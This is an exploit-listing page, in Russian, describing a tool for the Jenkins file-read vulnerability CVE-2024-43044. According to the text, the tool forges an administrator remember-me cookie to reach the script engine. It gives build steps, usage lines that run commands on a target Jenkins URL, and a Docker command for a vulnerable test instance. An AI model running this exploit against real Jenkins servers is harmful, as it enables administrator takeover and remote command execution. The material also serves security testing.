Sploitus

Exploit for CVE-2024-43044-jenkins

kitploit · 2026-08-25

Exploit Code

MARKDOWN36 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CONVISOLABS-CVE-2024-43044-JENKINS
## Введение

Это эксплойт для CVE-2024-43044 — произвольное чтение файлов, которое позволяет агенту получать файлы с контроллера.

Эксплойт использует уязвимость для чтения файлов с целью подделки remember-me cookie для учётной записи администратора и получения доступа к скриптовому движку Jenkins.

Полный разбор доступен по ссылке https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

## Сборка эксплойта

root@kitploit:~
    
    
    mvn package
    

## Запуск эксплойта

root@kitploit:~
    
    
    Использование эксплойта:
        java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
        java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
        java -jar exploit.jar mode_attach <cmd>
    

## Тестирование

Вы можете протестировать его на уязвимой версии с помощью docker:

root@kitploit:~
    
    
    docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17